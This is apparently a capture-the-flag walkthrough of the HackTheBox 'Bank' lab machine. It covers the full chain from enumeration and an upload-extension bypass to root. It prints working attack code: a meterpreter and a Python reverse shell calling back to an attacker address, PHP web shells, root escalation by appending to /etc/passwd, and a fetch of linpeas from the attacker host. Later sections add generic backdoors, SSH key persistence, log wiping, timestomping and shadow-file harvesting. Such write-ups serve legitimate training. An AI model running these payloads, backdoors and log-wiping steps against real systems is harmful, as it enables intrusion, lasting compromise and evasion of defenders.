HackTheBox Bank

---

Machine Synopsis

Key Exploitation Techniques:

• DNS enumeration via HTTP redirects and hostname discovery
• File upload vulnerability exploitation with extension bypass (.htb)
• SUID binary privilege escalation
• Writable /etc/passwd exploitation for root access

Reconnaissance & Enumeration

Port Discovery

$ nmap -sC -sV -A 10.10.10.29
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)

DNS and Hostname Discovery

Based on the machine name “Bank” and presence of DNS service, the hostname bank.htb was tested:

# Add hostname to /etc/hosts
$ echo "10.10.10.29 bank.htb" >> /etc/hosts

# Verify hostname resolution
$ nslookup bank.htb
Server:     10.10.10.29
Address:    10.10.10.29#53

Name:       bank.htb
Address:    10.10.10.29

Web Application Analysis

# Directory enumeration
$ gobuster dir --url http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 50
/support.php          (Status: 302)
/uploads              (Status: 301)
/login.php            (Status: 200)
/inc                  (Status: 301)
/balance-transfer     (Status: 301)

Key Findings:

• Login portal at /login.php
• File upload directory at /uploads
• Balance transfer directory at /balance-transfer

Exploitation

Credential Discovery

# Analyze balance-transfer directory
$ curl -s http://bank.htb/balance-transfer/ | grep -E "href.*\.acc" | head -10

# Sort files by size to identify anomalies
$ curl -s http://bank.htb/balance-transfer/ | grep -E "\d+ bytes" | sort -k3 -n | head -5

Analysis Results:

• Most files are ~584 bytes
• One file significantly smaller (~257 bytes)
• Smaller file contains plaintext credentials instead of encrypted data

# Download suspicious file
$ wget http://bank.htb/balance-transfer/68576f20e9732f1b2edc4df5b8533230.acc

$ cat 68576f20e9732f1b2edc4df5b8533230.acc
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

Accnt Balance: 285424.00

Username: chris@bank.htb
Password: !##HTBB4nkP$ssw0rd!##
Email: chris@bank.htb

Discovered Credentials: chris@bank.htb:!##HTBB4nkP$ssw0rd!##

Web Application Access

Login to the banking portal reveals a file upload interface in the support ticket system.

File Upload Vulnerability

Upload Restriction Analysis

Page source inspection reveals:

<!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->

Key Finding: .htb extension executes as PHP

PHP Reverse Shell Creation

# Create PHP reverse shell
$ msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=1234 -f raw > shell.htb

# Setup Metasploit handler
$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set LHOST 10.10.14.2
msf6 exploit(multi/handler) > set LPORT 1234
msf6 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

Shell Deployment

1. Upload shell.htb through support ticket interface
2. Access uploaded file: http://bank.htb/uploads/shell.htb

[*] Started reverse TCP handler on 10.10.14.2:1234 
[*] Meterpreter session 1 opened (10.10.14.2:1234 -> 10.10.10.29:35630)

meterpreter > shell
www-data@bank:/var/www/bank/uploads$ whoami
www-data

Privilege Escalation

SUID Binary Discovery

www-data@bank:/var/www/bank/uploads$ find / -type f -user root -perm -4000 2>/dev/null
/var/htb/bin/emergency

Critical Finding: /var/htb/bin/emergency - Custom SUID binary

SUID Binary Exploitation

www-data@bank:/var/www/bank/uploads$ /var/htb/bin/emergency
# whoami
root
# cat /home/chris/user.txt
c81ee9df3751ccf82b64af3046a3269a
# cat /root/root.txt
e92b13e6ff0dd9361add88e07b6687c9

Alternative: /etc/passwd Exploitation

# Verify writable permissions
www-data@bank:/var/www/bank/uploads$ ls -l /etc/passwd /etc/shadow
-rw-rw-rw- 1 root root   1252 May 28  2017 /etc/passwd
-rw-r----- 1 root shadow  895 Jun 14  2017 /etc/shadow

Alternative Path: /etc/passwd is world-writable

# Generate password hash
$ openssl passwd -1 shiro
$1$pOJIRjNf$gJAUfsAmmuY1XUuud4ink/

# Add root user to /etc/passwd
www-data@bank:/var/www/bank/uploads$ echo 'shiro:$1$pOJIRjNf$gJAUfsAmmuY1XUuud4ink/:0:0:pwned:/root:/bin/bash' >> /etc/passwd

# Switch to new root user
www-data@bank:/var/www/bank/uploads$ su - shiro
Password: shiro
root@bank:~# whoami
root

Post-Exploitation Techniques

Persistence Methods

SSH Key Persistence

# Generate SSH key pair
$ ssh-keygen -t rsa -b 4096 -f bank_persistence

# Install as root
# mkdir -p /root/.ssh
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /root/.ssh/authorized_keys
# chmod 600 /root/.ssh/authorized_keys
# chmod 700 /root/.ssh

Web Shell Maintenance

# Create PHP backdoor
# cat > /var/www/bank/uploads/.system.php << 'EOF'
<?php
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
EOF

# Hide from directory listings
# chattr +i /var/www/bank/uploads/.system.php

SUID Backdoor

# Create additional SUID shell
# cp /bin/bash /tmp/.bank_shell
# chmod 4755 /tmp/.bank_shell

# Test backdoor
www-data@bank:/tmp$ /tmp/.bank_shell -p
bash-4.3# whoami
root

Defense Evasion

Log Cleanup

# Clear web server logs
# > /var/log/apache2/access.log
# > /var/log/apache2/error.log

# Clear system logs
# > /var/log/auth.log
# > /var/log/syslog
# > /var/log/wtmp
# > /var/log/lastlog

# Clear command histories
# > /root/.bash_history
# > /var/www/.bash_history

File Attribute Manipulation

# Hide backdoor files with system attributes
# chattr +i /tmp/.bank_shell
# chattr +i /var/www/bank/uploads/.system.php

# Timestomp to match system files
# touch -r /bin/bash /tmp/.bank_shell

Lateral Movement Preparation

Network Discovery

# Discover network topology
# ip route show
# arp -a

# Internal network scanning
# for i in {1..254}; do ping -c 1 -W 1 10.10.10.$i | grep "64 bytes" | cut -d" " -f4 | tr -d ":"; done

Credential Harvesting

# Search banking application for database credentials
# grep -r "password\|mysql\|database" /var/www/bank/ 2>/dev/null

# Extract shadow file
# cp /etc/shadow /tmp/shadow.backup

# Search for SSH keys
# find /home -name "id_*" -o -name "*.pem" 2>/dev/null

Service Enumeration

# List active services
# ss -tlnp

# Check for database services
# ps aux | grep -E "(mysql|postgres|mongo)"

# Examine running processes
# ps aux --forest

Alternative Exploitation Methods

Manual File Upload

# Test various extensions
$ for ext in php php3 php4 php5 phtml htb; do
    echo "<?php system('id'); ?>" > test.$ext
    curl -F "file=@test.$ext" http://bank.htb/upload_endpoint
done

SQL Injection Testing

# Test login form for SQL injection
$ sqlmap -u "http://bank.htb/login.php" --data "email=admin&password=admin" --batch

Directory Traversal

# Test for directory traversal in file parameters
$ curl "http://bank.htb/include.php?file=../../../../etc/passwd"

Alternative PHP Shells

Simple Command Shell

<?php
if(isset($_GET['c'])) {
    system($_GET['c']);
}
?>

Python Reverse Shell

<?php
system('python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.2\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"');
?>

Alternative Privilege Escalation

LinPEAS Enumeration

# Transfer and run LinPEAS
www-data@bank:/tmp$ wget 10.10.14.2/linpeas.sh
www-data@bank:/tmp$ chmod +x linpeas.sh
www-data@bank:/tmp$ ./linpeas.sh

Kernel Exploitation

# Check kernel version
www-data@bank:/tmp$ uname -a
Linux bank 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015

# Search for kernel exploits
$ searchsploit linux kernel 3.19 | grep -i privilege

Sudo Misconfiguration

# Check for sudo privileges
www-data@bank:/tmp$ sudo -l 2>/dev/null

# Check for NOPASSWD entries
www-data@bank:/tmp$ grep -i nopasswd /etc/sudoers 2>/dev/null

---